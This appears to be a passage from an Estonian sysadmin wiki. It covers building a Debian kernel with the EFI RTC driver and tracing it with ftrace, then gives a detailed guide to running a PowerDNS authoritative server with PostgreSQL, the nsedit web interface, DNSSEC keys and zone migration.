imre@kernel-deb-13-01:~$ diff orig/linux-source-6.12/drivers/rtc/Kconfig 20251001/linux-source-6.12/drivers/rtc/Kconfig
1180c1180
< depends on EFI && !X86
---
> depends on EFI

imre@kernel-deb-13-01:~/20251001/linux-source-6.12$ make -j 32 bindeb-pkg
</pre>

Tulemusena

<pre>
root@kernel-deb-13-01:~# ls -ld /home/imre/20251001/linux-*
-rw-r--r-- 1 imre imre 9175852 Oct 2 00:07 /home/imre/20251001/linux-headers-6.12.48_6.12.48-2_amd64.deb
-rw-r--r-- 1 imre imre 109643260 Oct 2 00:07 /home/imre/20251001/linux-image-6.12.48_6.12.48-2_amd64.deb
-rw-r--r-- 1 imre imre 999103852 Oct 2 00:08 /home/imre/20251001/linux-image-6.12.48-dbg_6.12.48-2_amd64.deb
-rw-r--r-- 1 imre imre 1395812 Oct 2 00:06 /home/imre/20251001/linux-libc-dev_6.12.48-2_amd64.deb
-rw-rw-r-- 1 imre imre 6109 Oct 2 00:09 /home/imre/20251001/linux-upstream_6.12.48-2_amd64.buildinfo
-rw-rw-r-- 1 imre imre 2260 Oct 2 00:09 /home/imre/20251001/linux-upstream_6.12.48-2_amd64.changes
</pre>

Paigaldamine

<pre>
root@kernel-deb-13-01:~# dpkg -i /home/imre/20251001/linux-image-6.12.48_6.12.48-2_amd64.deb

root@kernel-deb-13-01:~# find /lib/modules/6.12.48 -name rtc-efi\* -ls
559702 8 -rw-r--r-- 1 root root 4708 Oct 2 00:05 /lib/modules/6.12.48/kernel/drivers/rtc/rtc-efi.ko.xz
</pre>

Kasutamine, nt grub bootloaderisse sekkumisel näidata

<pre>
linux /boot/vmlinuz-6.12.48 root=/dev/mapper/system-root ro efi=runtime modprobe.blacklist=rtc_cmos
initrd /boot/initrd.img-6.12.48
</pre>

Tulemusena

<pre>
root@kernel-deb-13-01:~# uname -a
Linux kernel-deb-13-01 6.12.48 #2 SMP PREEMPT_DYNAMIC Thu Oct 2 00:05:59 EEST 2025 x86_64 GNU/Linux

root@kernel-deb-13-01:~# dmesg -T | grep rtc
[Thu Oct 2 00:11:10 2025] Command line: BOOT_IMAGE=/boot/vmlinuz-6.12.48 root=/dev/mapper/system-root ro efi=runtime modprobe.blacklist=rtc_cmos
[Thu Oct 2 00:11:10 2025] Kernel command line: BOOT_IMAGE=/boot/vmlinuz-6.12.48 root=/dev/mapper/system-root ro efi=runtime modprobe.blacklist=rtc_cmos
[Thu Oct 2 00:11:11 2025] rtc-efi rtc-efi.0: registered as rtc0
[Thu Oct 2 00:11:11 2025] rtc-efi rtc-efi.0: setting system clock to 2025-10-01T21:11:09 UTC (1759353069)

root@kernel-deb-13-01:~# hwclock --show
2025-10-02 01:35:16.360299+03:00
</pre>

Kasulikud lisamaterjalid

* 'Building a custom kernel from Debian kernel source' - https://kernel-team.pages.debian.net/kernel-handbook/ch-common-tasks.html#s-common-building

===Kerneli siseste funktsioonide debugimine===

Sedasi saab veenduda, et hwclock kasutab peale eelmises punktis tehtud muudatuse 'efi runtime services' osakonda (mitte klassikalist rfc_cmos osakonda)

<pre>
root@kernel-deb-13-01:/sys/kernel/tracing# cat /sys/kernel/tracing/available_filter_functions | grep efi_ | grep time
root@kernel-deb-13-01:/sys/kernel/tracing# cd /sys/kernel/tracing
root@kernel-deb-13-01:/sys/kernel/tracing# echo > trace
root@kernel-deb-13-01:/sys/kernel/tracing# echo nop > current_tracer
root@kernel-deb-13-01:/sys/kernel/tracing# echo > set_ftrace_filter
root@kernel-deb-13-01:/sys/kernel/tracing# echo efi_read_time > set_ftrace_filter
root@kernel-deb-13-01:/sys/kernel/tracing# echo function > current_tracer
root@kernel-deb-13-01:/sys/kernel/tracing# echo 1 > tracing_on

root@kernel-deb-13-01:/sys/kernel/tracing# hwclock --show & echo "before $! after"
[1] 1525
before 1525 after
root@kernel-deb-13-01:/sys/kernel/tracing# 2025-10-02 03:05:13.888490+03:00

[1]+ Done hwclock --show

root@kernel-deb-13-01:/sys/kernel/tracing# echo 0 > tracing_on

root@kernel-deb-13-01:/sys/kernel/tracing# cat trace | head -n 15
# tracer: function
#
# entries-in-buffer/entries-written: 1458/1458 #P:32
#
# _-----=> irqs-off/BH-disabled
# / _----=> need-resched
# | / _---=> hardirq/softirq
# || / _--=> preempt-depth
# ||| / _-=> migrate-disable
# |||| / delay
# TASK-PID CPU# ||||| TIMESTAMP FUNCTION
# | | | ||||| | |
hwclock-1525 [003] ..... 10443.012235: efi_read_time <-__rtc_read_time
hwclock-1525 [003] ..... 10443.012346: efi_read_time <-__rtc_read_time
hwclock-1525 [003] ..... 10443.012425: efi_read_time <-__rtc_read_time
</pre>

kus

* hwclock käsk antakse ja küsitakse tema pid väärtust
* trace failis on fikseeritud pid mis oli seotud efi_read_time funktsiooni väljakutsumisega

===netconsole===

TODO

===Misc===

<pre>
#!/bin/bash
AEG=`date +%Y%m%d-%H%M`;
MDIR="m-state-$AEG";
mkdir $MDIR

ifconfig -a > "$MDIR/ifconfig-a-$AEG"
route -n > "$MDIR/route-n-$AEG"
ps axu > "$MDIR/ps-auxw-$AEG"
netstat -anp > "$MDIR/netstat-anp-$AEG"
mount > "$MDIR/mount-$AEG"
df > "$MDIR/df-$AEG"
iptables-save > "$MDIR/iptables-save-$AEG"
ip6tables-save > "$MDIR/ip6tables-save-$AEG"
dmesg > "$MDIR/dmesg-$AEG"
</pre>

===Kasulikud lisamaterjalid===

* [[:Operatsioonisüsteemi Debian GNU/Linux paketihalduse kasutamine]]
* http://www.debian.org/security/
* http://www.debian-administration.org/
* http://wiki.debian.org/
* http://www.debian.org/distrib/packages
* http://debian.org/doc/maint-guide
* http://www.debianadmin.com/
* http://debian.catsanddogs.com/
* http://debconf9.debconf.org/ - sisaldab videosalvestusi Debiani arendajate esinemistest DebConfidel
* http://cdimage.debian.org/cdimage/unofficial/non-free/firmware/lenny/current/
* http://debian-live.alioth.debian.org/
* http://www.emdebian.org/

PowerDNS Authoritative Server nimeserveri kasutamine

2026-06-15T22:26:53Z

Imre: /* Kasulikud lisamaterjalid */

===Sissejuhatus===

PowerDNS https://www.powerdns.com/ on üks populaarsetest vaba tarkvaralistest nn alternatiivsetest DNS serveritest, kuigi 'alternatiivse' kohta väidetavalt teda kasutatakse väga massiliselt DNSSEC jaoks. PowerDNS tarkvara võimaldab pidada täielist DNS infrastruktuuri, sh slave ja master pädevate nimeserverite erinevad konfiguratsioonid. PowerDNS tarkvara komplekti kuuluvad

* PowerDNS Authoritative Server - pädev nimeserver
* PowerDNS Recursor - rekursiivne nimeserver
* dnsdist - koormusjaotur

PowerDNS Authoritative Server tarkvaral on sellised tunnused

* võimalus kasutada andmete salvestamiseks erinevaid nn backend'isid (nn plain text, sql andmebaas, ldap kataloog jne)
* väga mugavalt korraldada DNSSEC tsooni pidamist
* tsoonide käsitlemine (tekitamine, sisu muutmine, eemaldamine) on võimalik üle nn API
* eksisteerivad mitmesugused veebipõhised tsoonide haldusliidesed (otse baasi ja üle API)
* ebamugav on kontrollida, kust tsooni kopeeritakse, kuhu notify saadetakse ja kust lubatakse tsooni kopeerida

Haldusliidesed jagunevad kaheks

* kirjutavad otse samasse sql baasi, mida kasutab PowerDNS ja tegelikult töötavadki ainult SQL backendide puhul - nt Poweradmin, http://www.poweradmin.org/
* suhtlevad PowerDNS'iga üle API, töötavad kõigi backendide puhul - nt nsedit, https://github.com/tuxis-ie/nsedit

Järgnevas tekstis öeldakse lühiduse mõttes PowerDNS ja mõeldakse PowerDNS Authoritative Server ehk pädevat komponenti.

===Tööpõhimõte===

PowerDNS tarkvara saab kasutada erinevates konfiguratsioonides

* nö suure pildi mõttes, nt PowerDNS on varjatud master ja avalikus võrgus teenindavad NSD nimeserverid (alternatiiv oleks pidada PowerDNS nimeserverit otse avalikus võrgus)
* PowerDNS enda komponentidest on välja valitud mingi komplekt, nt baas osa ja PostgreSQL backend (alternatiiv oleks BIND formaadis tekstifailid failisüsteemis)
* tsooniandmete haldamiseks kasutatakse käsurea utiliiti pdnsutil ja nsedit php rakendust

Käesolevas tekstis keskendutakse just mainitud konfiguratsioonile. Kui PowerDNS kasutab SQL backendi, siis avaliku pädeva DNS teenuse pakkumise juures tekitab see vähemalt esmapilgul kahtlusi. Võib olla on hea mõte tekitada varjatud masteriga lahendus

ans1 (NSD) ans2 (NSD)
_____ _____
| | | |
| | | |
|_____| port 8952 |_____| port 8952
| |
| |
----|---------------------|----------------------|----
|
__|__
| | nimetaja (PowerDNS)
| |
|_____|

kus

* ans1, ans2 - avalikud pädevad nimeserverid, tehniliselt slave'id
* nimetaja - varjatud pädev nimeserver, tehniliselt master
* üle port 8952 saab nsd protsessi eemalt juhtida (alternatiiv on juhtida nö tavalisel viisil, lokaalselt)

Käesolevas tekstis pööratakse NSD tarkvara kasutamisele tähelepanu minimaalselt. NSD tekst asub aadressil [[:Pädeva nimeserveri NSD v. 4 kasutamine operatsioonisüsteemiga Debian]].

===Tarkvara paigaldamine ja seadistamine===

Tarkvara paigaldamiseks on üldiselt kaks võimalust

* operatsioonisüsteemi paketihaldus
* PowerDNS repositoorium - https://repo.powerdns.com/

PowerDNS tarkvara on jaotatud komponentideks

* üldosa
* tsoonidega seotud andmete salvesamiseks erinevad backendid (failisüsteem, SQL andembaas jne)

Kui asutakse kasutama SQL backendi, siis võib olla otstarbekas enne PowerDNS vastava backendi paigaldamist baas ise paigaldada ja käivitada; nt nt see baas ei pruugi olla tingimata samas arvutis. Teisipidi, mugavam on samas arvutis, kuna sel juhul baasi saab lähtestada dbconfig süsteemi abil; lisaks, kui kasutatakse DNSSEC'i, siis arvestada, et krüptomaterjal asub baasis. Käesolevas tekstis paigaldatakse tarkvara PowerDNS repositooriumist kuna seal on alati kõige värskem.

====PostgreSQL andmebaasi ettevalmistamine====

PowerDNS tarkvara ei ole PostgreSQL andmebaasi versiooni suhtes nõudlik, tõenäoliselt sobib igasugune v. 9.x ja nt en_US.UTF-8 kodeering

# apt-get install postgresql

====Paigaldamine PowerDNS repositooriumist====

PowerDNS repositoorium asub aadressil https://repo.powerdns.com/ ja kasutamine (Debian v. 9 Stretch juhtumil)

# cat /etc/apt/sources.list.d/pdns.list
deb http://repo.powerdns.com/debian stretch-auth-master main

ning öelda

# curl https://repo.powerdns.com/CBC8B383-pub.asc | sudo apt-key add -
# apt-get update

Tarkvara paigaldamiseks öelda (paistab, et bind backend paigaldatakse lisaks paratamatult)

# apt-get install pdns-server pdns-backend-pgsql

seejuures on valik paigaldada baas db-config süsteemi abil ja see validagi. Tulemusena tekitatakse baasi baasi kasutaja, create database, initsiliseeritakse baasi sisu ning kirjeldatakse PowerDNS backend seadistus

# cat /etc/powerdns/pdns.d/pdns.local.gpgsql.conf
# PostgreSQL Configuration
#
# Launch gpgsql backend
launch+=gpgsql

# gpgsql parameters
gpgsql-host=127.0.0.1
gpgsql-port=
gpgsql-dbname=pdns
gpgsql-user=pdns
gpgsql-password=pdnsparool
gpgsql-dnssec=yes

Vaikimisi käivitatakse PowerDNS protsessid ning natuke saab asuda süsteemi kasutama

# pdns_control list-zones
All zonecount:0

Järgmisena tuleb PowerDNS server seadistada.

====Käsitsi baasi lähtestamine====

Kui db-config süsteemi mitte kasutada, sobib tekitada kasutaja ja create database andmebaas käsitsi

# su - postgres
$ psql
..
postgres=# create role pdns login password 'pdnsparool' NOSUPERUSER INHERIT NOCREATEDB NOCREATEROLE;
postgres=# create database pdns owner = pdns;

ning seejärel laadida baasi sisu, õieti struktuur

# psql -h 127.0.0.1 -U pdns pdns < /usr/share/doc/pdns-backend-pgsql/schema.pgsql.sql

Lisaks peab olema seadistusfail /etc/powerdns/pdns.d/pdns.local.gpgsql.conf sobiva sisuga, vt. eelmist punkti.

===Tarkvara seadistamine===

Üldosa sobiks kokkuvõttes seadistada nt nii

# egrep -v "^$|^#" /etc/powerdns/pdns.conf
allow-axfr-ips=127.0.0.0/8,::1,192.168.1.210
also-notify=192.168.1.210
api=yes
api-key=midagisalajast123
default-soa-mail=hostmaster.moraal.ee.
default-soa-name=ans1.moraal.ee.
include-dir=/etc/powerdns/pdns.d
launch=
master=yes
only-notify=192.168.1.210
security-poll-suffix=
setgid=pdns
setuid=pdns
slave=yes
soa-expire-default=3600000
soa-minimum-ttl=3600
soa-refresh-default=86400
soa-retry-default=7200
webserver=yes
webserver-address=192.168.1.248
webserver-allow-from=0.0.0.0/0,::/0,192.168.10.0/24

kus

* allow-axfr-ips - millistelt ip aadressidelt on lubatud axfr
* also-notify - millistele ip aadressidel töötavatele nimeserveritele saata notify
* api* - api kasutamine (vajalik veebipõhise haldusliidese nsedit jaoks)
* default-soa-* - uue tsooni sisu moodustamisel kasutatavad vaikeväärtused
* only-notify - notify saadetakse ainult näidatud ip aadressidele (mitte tsoonifailides siselduvatele NS serveritele)
* soa-* uue tsooni sisu moodustamisel kasutatavad vaikeväärtused
* webserver* - powerdns sisemise veebiserveri ip aadress jms (saab uurida protsesside statistikat)

Muudatuste kehtestamiseks lõpetada ja käivitada pdns protsessid

# systemctl stop pdns
# systemctl start pdns

===Tsooni sisu haldamine käsurealt===

Tsooni sisu haldamine käsurealt toimub utiliidi pdnsutil abil. Uue tühja tsooni tekitamine (sisaldab SOA kirjet), seejärel tuleb vähemalt NS kirje tekitada (nb! nii tekib Native tüüpi tsoon)

# pdnsutil create-zone moraal.ee

Tulemuse küsimine

# pdnsutil show-zone moraal.ee

Tsooni Native -> Master teisendus

# pdnsutil set-kind moraal.ee master

Tsooni sisu esitamiseks

# pdnsutil list-zone moraal.ee

Sisu muutmiseks, sh muuta käsitsi SOA serial

# pdnsutil edit-zone moraal.ee

utiliidiga seriali suurendamiseks

# pdnsutil increase-serial moraal.ee

Tulemuse küsimine

# dig @127.0.0.1 moraal.ee axfr

Notify käsitsi välja saatmiseks

# pdns_control notify moraal.ee
Added to queue

Kirje lisamine (lisaks tuleb increase serial öelda)

# pdnsutil add-record moraal.ee imre5 A 300 "127.0.0.5"
Feb 21 10:20:54 [bindbackend] Done parsing domains, 0 rejected, 0 new, 0 removed
New rrset:
imre5.moraal.ee. IN A 300 127.0.0.5

===Veebipõhine haldusliides nsedit===

Veebipõhiste haldusliideste abil saab

* tekitada ja kustutada tsoone, muuta tsoonide sisu
* loodetavasti haldusliidese abil jäävad tegemata mingid süntaksivead, mida on kerge teha nn BIND-ühilduvat tsoonifaili tavalise tekstieditoriga otse muutes
* tsooni sisu halduse saab usaldada mitte-vi/joe/nano ekspertiisiga inimesele

Paistab, et veebipõhiseid haldusliideseid on omajagu, https://github.com/PowerDNS/pdns/wiki/WebFrontends. nsedit on PHP rakendus. Märkused

* Tsoonis tehtud muudatustega kaasneb automaatselt SOA seriali suurenemine
* Veebiliideses tehtud muudatused ei kajastu alati sama veebiliideses koheselt (nt SOA seriali muutumine, välja ja sisselogimise järel on näha)
* nsedit esitab muudatuste logi
* toimib ipv6 jaoks
* nn õäöü tähti sisaldavaid nimesid sisestada otseselt ei saa
* rakenduse võib paigaldada http:// peale ja seejärel muuta veebiserveri seadistusi ning kasutada edasi https:// abil
* nsedit ei pea asuma samas arvutis PowerDNS serveriga, suhtlemine toimub üle võrgu ja kasutades API liidest

====Ettevalmistused====

nsedit kasutamise eelduseks on selline tarkvara

# apt-get install apache2 php git php-sqlite3 php-curl

====Paigaldamine ja seadistamine====

Kopeerida tarkvara, tundub, et 2017 aasta alguses on praktiline võtta git repo viimane ots

# cd /var/www/html
# git clone https://github.com/tuxis-ie/nsedit.git

Tekitada php skriptide jaoks kasutaja:grupp

# groupadd nsedit
# useradd -g nsedit -m -d /opt/nsedit -s /bin/false nsedit

Avades brauseris http://pdns.moraal.ee/nsedit küsitakse parooli, vaikimisi sobib admin ja admin mille järel

* kontrollitakse vajalike teekide olemasolu
* moodustatakse sqlite3 andmebaas

# sqlite3 /var/www/html/etc/pdns.users.sqlite3
..
sqlite> .tables
logs users zones

nsedit seadistatakse failis /var/www/html/nsedit/includes/config.inc.php

# cp includes/config.inc.php-dist includes/config.inc.php

* ühendust powerdns serveriga üle api juhib sektsioon

# cat /var/www/html/nsedit/includes/config.inc.php | grep '^$api'
$apipass = 'apiparool'; # The PowerDNS API-key
$apiip = '10.0.9.18'; # The IP of the PowerDNS API
$apiport = '8081'; # The port of the PowerDNS API
$apiproto = 'http'; # http | https
$apisslverify = FALSE; # Verify SSL Certificate if using https for apiproto

* vaikeväärtuste kasutamiset haldusliideses kontrollib

$defaults['soa_edit'] = 'INCEPTION-INCREMENT';
$defaults['soa_edit_api'] = 'INCEPTION-INCREMENT';
$defaults['defaulttype'] = 'Master'; # Choose between 'Native' or 'Master'
$defaults['ns'][0] = 'ns1.moraal.ee.'; # The value of the first NS-record
$defaults['ns'][1] = 'ns2.moraal.ee.'; # The value of the second NS-record
$defaults['ttl'] = 3600; # Default TTL for records
$defaults['disabled'] = false; # Default disabled state

Kasutajaliides paistab välja selline

[[Pilt:Pdns-1.gif]]

kus

* TODO

Kui rakendus töötab, muuta rakenduse failide omanik:grupp ära

# chown -R nsedit:nsedit /var/www/html/nsedit

====Kasutamine====

* Kasutajate lisamine, valida (ning märkida linnuke admin user jaoks), tulemusena on nsedit logid paremad

Users -> Add new user

* Uue tsooni lisamine, valida

Zones -> Add new zone

ning sisestada Domain lahtrisse domeeninimi, lõpetades punktiga, nt

test-1.ee.

Kõik muud valikud jätta vaikimisi

Account - admin
Type - master
Template - None

Kuna pdns serveri seadistusfailisis on näidatus SOA kirje väärtused ja nsedit seadisusfailis on kirjeldatud nimeserverid, siis tekib vaikimisi kastutatav tulemus.

* Uue tsooni lisamine kirjeldades korraga palju kirjeid (nt tsooni ületoomisel eelmise dns teenusepakkuja juurest)

Zones -> Import a new zone

seejuures

avanenud dialoogi pasteda tsoonifaili sisu
eemaldada SOA kirje
asendada NS kirjetesse õiged väärtused
kõik nimed (kirje kõige vasem positsioon) peavad olema pikad ja lõppema punktiga
eemaldada linnuke 'Overwrite Nameservers' juurest

* Mitme elemendilise väärtuse puhul tuleb see nii sisestada, nt MX kirje puhul

10 mx.moraal.ee.

* Eeldusel, et on olemas Content tulbas kasutatav A kirje ip aadressile vastav in-addr.arpa tsoon, saab nsedit abil tekitada automaatselt PTR kirje.

====Kasulikud lisamaterjalid====

* https://github.com/tuxis-ie/nsedit

===DNSSEC tsooni esmane juurutamine===

Tundub, et uuemal ajal saab DNSSEC juures kasatada CSK (Combined Signing Key) võtit ja seda kasutab PowerDNS vaikimisi, kuid samas CSK võtmeid registripidajad eriti ei toeta. Ja PowerDNS toetab ka nö klassikalist KSK+ZSK komplekti kasutamist.

====KSK ja ZSK võtmete kasutamine====

Võtmete tsooniga seostamiseks sobib öelda

# pdnsutil add-zone-key moraal.ee ksk 2048 active rsasha256
# pdnsutil add-zone-key moraal.ee zsk 1024 active rsasha256
# pdnsutil set-nsec3 moraal.ee '1 0 5 0...f'
# pdnsutil set-meta moraal.ee SOA-EDIT-API INCEPTION-INCREMENT
# pdnsutil set-meta moraal.ee SOA-EDIT INCEPTION-INCREMENT
# pdnsutil increase-serial moraal.ee
# pdnsutil rectify-zone moraal.ee
# pdnsutil show-zone moraal.ee

mis

* tekitab võtmed
* kui set-meta kogemata vääratab, nt lisati SOA-EDIT-SOA, siis saab meta data eemaldada, st näitamata väärtust

# pdnsutil set-meta moraal.ee SOA-EDIT-SOA

* võtab kasutusele nsec3 hash'ide arvutamiseks vajaliku materjali (0-f on 16-elemendiline juhuslik hex järgnevus, mis saadake nt nii

$ head -c 512 /dev/urandom | sha1sum | cut -b 1-16
7bc59a6dd87fa477

ja ideaalis võiks seda regulaarselt muuta), nt

$ dig +short moraal.ee nsec3param
1 0 5 E7544BB6070C3E0F

(kus 1 - sha1, 0 - opt-out, 5 - iterations, E7544BB6070C3E0F - salt)

* INCEPTION-INCREMENT rida seadistab selliselt, et kui automaaselt tsooni andmed resigneeritakse, siis suurendatakse ka seriali (muidu ei toimu notify ja andmed ei jõua avalikesse pädevatesse nimeserveritesse)
* rectify tuleb põhimõtteliselt öelda peale iga tsooni muudatust, et olla täiesti kindel tsooni toimimises; kui PowerDNS kasutatakse avalike nimeserverite varjatud masterina, pole see probleem

ning tsooni andmed paistavad

# pdnsutil show-zone moraal.ee
Nov 06 23:49:44 [bindbackend] Done parsing domains, 0 rejected, 0 new, 0 removed
This is a Master zone
Last SOA serial number we notified: 2016103003 == 2016103003 (serial in the database)
Metadata items:
SOA-EDIT INCEPTION-INCREMENT
SOA-EDIT-API INCEPTION-INCREMENT
Zone has NSEC3 semantics, configuration: 1 0 1 ab
keys:
ID = 11 (ZSK), flags = 256, tag = 26589, algo = 8, bits = 1024 Active ( RSASHA256 )
ID = 10 (KSK), flags = 257, tag = 53461, algo = 8, bits = 2048 Active ( RSASHA256 )
KSK DNSKEY = moraal.ee. IN DNSKEY 257 3 8 AwEAAcn... TQcnQstT+tU= ; ( RSASHA256 )
DS = moraal.ee. IN DS 53461 8 1 6c123b39076072da... c66f62b1e3c388b86b7f ; ( SHA1 digest )
DS = moraal.ee. IN DS 53461 8 2 b85dee98efa6e3bb... 57ce193f728f6b2b1d0dd262 ; ( SHA256 digest )
DS = moraal.ee. IN DS 53461 8 3 1359b0b2b97e60b2... 844b207e84bf5c109eb2e151 ; ( GOST R 34.11-94 digest )
DS = moraal.ee. IN DS 53461 8 4 6d735926cd5cf68b... 9ca2af1f72b3b8f67900bb32a94c ; ( SHA-384 digest )

kus

* kaks võtit, ID väärtustega 10 ja 11

Seejärel tuleb registripidajale öelda DS väärtus.

Tulemuse saab kontrollida nt aadressil http://dnsviz.net/d/moraal.ee/dnssec/.

DNSSEC eemaldamiseks tuleb

* esmalt eemaldada registripidaja juurest DS kirje (reeglina see õnnestub, aga nt 2017 aasta kevadel .org domeenide puhul on tulemuseks dnssec viga, tavaline servfail)
* tsoonis dnssec väljalülitamiseks sobib öelda

# pdnsutil disable-dnssec moraal.ee

====Tulemuse kontrollimine====

Kui kõik juba töötab (ja on vist on vajalik, et kasutada on mõni dnssec-võimeline rekursiivne nimeserver), saab tulemust kontrollida nt nii

$ ldns-rrsig moraal.ee a
moraal.ee RRSIG(a): Thu Oct 27 00:00:00 2016 - Thu Nov 17 00:00:00 2016

====Märkused====

* DNSSEC RRSIG signatuure arvutatakse iga 2 nädala tagant üle selleks, et piirata replay attack võimalusi. Põhimõtteliselt saab pahalane päringule vastuseks saata mõne varasemalt võrgus olnud vastuse (st RRSet + RRSIG komplekti) eeldusel, et ta kontrollib kasutaja võrguliiklust. Tänu RRSIG piiratud kehtivusajale (nt 2 nädalat) saab ta seda teha mitte vanemate kui 2 nädalat andmetega, lisaks ta on piiratud saatma mitte suvalisi vastuseid, vaid viimase kahe nädala jooksul kasutuses olnud vastuseid.

====Kasulikud lisamaterjalid====

* https://blog.powerdns.com/2016/02/02/powerdns-authoritative-the-new-old-way-to-manage-domains/

====CSK võtme kasutamine====

Märkus 2016 lõpus: tundub, et see CSK on mingi tulevikutehnoloogia.

Olemasoleva tsooni jaoks DNSSEC sisselülitamiseks sobib öelda

# pdnsutil secure-zone moraal.ee
# pdnsutil set-nsec3 moraal.ee '1 0 1 ab'
# pdnsutil rectify-zone moraal.ee
# pdnsutil set-meta moraal.ee SOA-EDIT-API INCEPTION-INCREMENT
# pdnsutil increase-serial moraal.ee
# pdnsutil show-zone moraal.ee

Seejärel tuleb registripidajale öelda DS väärtus.

Tulemuse saab kontrollida nt aadressil http://dnsviz.net/d/moraal.ee/dnssec/.

DNSSEC eemaldamiseks tuleb

* esmalt eemaldada registripidaja juurest DS kirje
* tsoonis dnssec väljalülitamiseks sobib öelda

# pdnsutil disable-dnssec moraal.ee

Misc

* tagasi nsec peale viimiseks

# pdnsutil unset-nsec3 moraal.ee

===DNSSEC tsooni seostamine DS sissekande abil ülevalpool oleva tsooniga===

DNSSEC tsooni seostamiseks ülevalpool oleva tsooniga on vaja teada selliseid andmeid

* võtme silt
* võtme tüüp
* algoritm
* avalik võti (või DS mis on avaliku võtme räsi vms)

Need kõik on avalik info ja kättesaadavad domeeni pädevast nimeserverist, aga PowerDNS haldusutiliidiga saab selle küsida otsekoheselt

# pdnsutil show-zone moraal.ee

Ühesõnaga, kui ise kasutatakse PowerDNS'i või partner saadab need andmed, siis allpool toodud dig käsuga tegelemist pole tarvis läbi teha. Tulemust sobib kontrollida nt aadressil http://dnsviz.net/.

====zone.ee keskkonnas - .ee tsoonis====

Logida sisse oma kasutajaga ja valida vasakult paneelist 'Teenuste ülevaade', kõnelaluse tsooni juures pressida rohelist + märki DNSSEC tulbas. Avanenud uuel eraanil vajutada üleval sinist nuppu Aktiveeri (muutub roheliseks), vajutada võtmete nimekirjas + märki ja täita lahtrid

[[Pilt:Pdns-3.gif]]

kus

* võtme silt - (antud juhul 53461), selle saab teada päringu väjundist

$ dig @ns.auul.pri.ee moraal.ee dnskey rrsig | grep DNSKEY
moraal.ee. 10800 IN RRSIG DNSKEY 8 2 10800 20161208000000 20161117000000 53461 moraal.ee. rVy+HAzSKkTRv6...

* võtme tüüp - KSK
* algoritm - 8 (RSA-SHA256)
* avalik võti, selle saab teada päringu väljundist, alates Aw kuni tU= (võib sisaldada tühikuid nagu päringu vastuses on)

$ dig @ns.auul.pri.ee moraal.ee dnskey | grep 257
moraal.ee. 3600 IN DNSKEY 257 3 8 AwEAAcnmmnnOlkRfK9NDYEI6F ... SD6 TQcnQstT+tU=

Vajutada all nuppu Kinnita, muudatus kehtestub peaaegu koheselt (ehk minutite jooksul), aga kasutajaliideses öeldakse

DNSSEC kaitse domeenil MORAAL.EE
Hetkestaatus: DNSSEC on aktiveerimata
Eesootavad muutused: DNSSEC aktiveeritakse

Teha brauseris refresh ja peab olema domeenide nimekirjas DNSSEC tulbas + asemel kilbi kujutis. Edasi läheb nn 15 minutit kuni muudatus zone.ee juurest eestiinternet.ee juurde jõuab ning kehtestub ee. tld (top level domain) nimeserverites. Kontrolliks maksab küsida tld nimeserverilt ds kirjet

$ dig +short @ns.tld.ee moraal.ee ds
30607 8 2 EAC8A17DD2128573F08EE76C18B4AB01734467CD4A376768F5358B0C A2B9463F

====zone.ee keskkonnas - .org tsoonis====

[[Pilt:Pdns-6.gif]]

====GoDaddy keskkonnas====

TODO

===DNSSEC võtmete asendamine===

====ZSK====

====KSK====

KSK moodi võtme lisamiseks sobib öelda, selliselt võib tsooniga siduda ka enam kui kaks võtit

# pdnsutil add-zone-key moraal.ee ksk 2048 active rsasha256

Tsooniga seotud võtmed paistavad käsu väljundis

# pdnsutil show-zone moraal.ee

Tulemusena paistab dnsviz keskkonnas selline pilt

TODO

Tsooniga seotud võtme eemaldamiseks sobib öelda, kus ID on show-zone väljundist välja valitud võtme ID väärtus

# pdnsutil remove-zone-key moraal.ee ID

====Kasulikud lisamaterjalid====

* https://doc.powerdns.com/md/authoritative/howtos/#zsk-rollover

===Mitmesugused haldusprotseduurid===

====tsooni backend muutmine====

TODO

====tsooni toomine PowerDNS kontrolli alla====

Tsooni migreerimiseks suvalisest AXFR-võimelisest nimeserverist sobib

* kirjeldada PowerDNS peal slave

# pdnsutil create-slave-zone moraal.ee 10.0.6.15
Feb 21 22:09:52 [bindbackend] Done parsing domains, 0 rejected, 0 new, 0 removed
Creating slave zone 'moraal.ee', with master(s) '10.0.6.15:53'

* kopeerida andmed axfr abil üle, kopeerimist kiirendab

# pdns_control retrieve moraal.ee

* muuta PowerDNS tsooni jaoks masteriks, öeldes

SQL> UPDATE domains set type='MASTER' where type='SLAVE';

Kui allikaks on nt BIND ning tsoonifailis on kasutatud generate konstruktsiooni, siis need lahenduvad automaatselt ära

$GENERATE 1-255 $ IN CNAME $.1-255.40.184.10.in-addr.arpa.

Kasulikud lisamaterjalid

* https://doc.powerdns.com/md/authoritative/migration/

====dnssec tsooni toomine PowerDNS kontrolli alla====

Analoogiliselt eelmisele punktile, aga

* esmalt lülitada dnssec välja, kustutades DS kirje parent tsoonist ja oodates vähemalt DS kirje TTL aja enne järgmise punkti juurde asumist; seejärel on tsooni sisu endine st vanade võtmetega signeeritud andmestik
* tegevused eelmises punktis + uute võtmetega krüptimine
* asuda kasutama uute võtmetega krüptitud tsooni sisu, ja oodata nt 6 tundi
* juurutada parent tsoonis uus DS kirje

====dnssec tsooni toomine PowerDNS kontrolli alla OpenDNSSEC keskkonnast koos vana KSK krüptomaterjaliga====

Eeldusel, et OpenDNSSEC kasutab SoftHSM backendi saab KSK krüptomaterjalid eksportida ja taaskasutada. Ettevalmistuseks tuleb kõnealune tsoon muus osas tavalisel viisil kasutusele võtta. SoftHSM pealt krüptomaterjali eksportimiseks tuleb esmalt teha kindlaks kolm väärust

* SoftHSM label ja pin vaadata nt /etc/opendnssec/conf.xml failist
* kõnealuse tsooni ksk võtme id, vaadata KSK active realt tulp 'CKA_ID'

# ods-ksmutil key list -v

sobib öelda

# softhsm --export moraal.ee-ksk.pem --slot 0 --label "vaartus" --pin vaartus --id vaartus
The key pair has been written to moraal.ee-ksk.pem

teisendada nn BIND kujule

# softhsm-keyconv --tobind --in ksk.pem --name moraal.ee --ksk --algorithm RSASHA256
The private key has been written to Kmoraal.ee+008+09122.private
The public key has been written to Kmoraal.ee+008+09122.key

ning võtta kasutusele PowerDNS juures

# pdnsutil import-zone-key moraal.ee Kksk+008+53675.private active ksk

Edasi seadistatakse DNSSEC analoogliselt nagu seada ikka PowerDNS puhul seadistatakse. Kusjuures 'pdnsutil import-zone-key ...' tulemus on sarnane nagu oleks öeldud

# pdnsutil add-zone-key moraal.ee ksk 2048 active rsasha256

Kasulikud lisamaterjalid

* http://www.molnar-peter.hu/en/

====pdns-control utiliidi kasutamine====

PowerDNS kus on master tsoon saadab notify oma slavedele (nagu on tsoonifaili NS kirjetes kirjas)

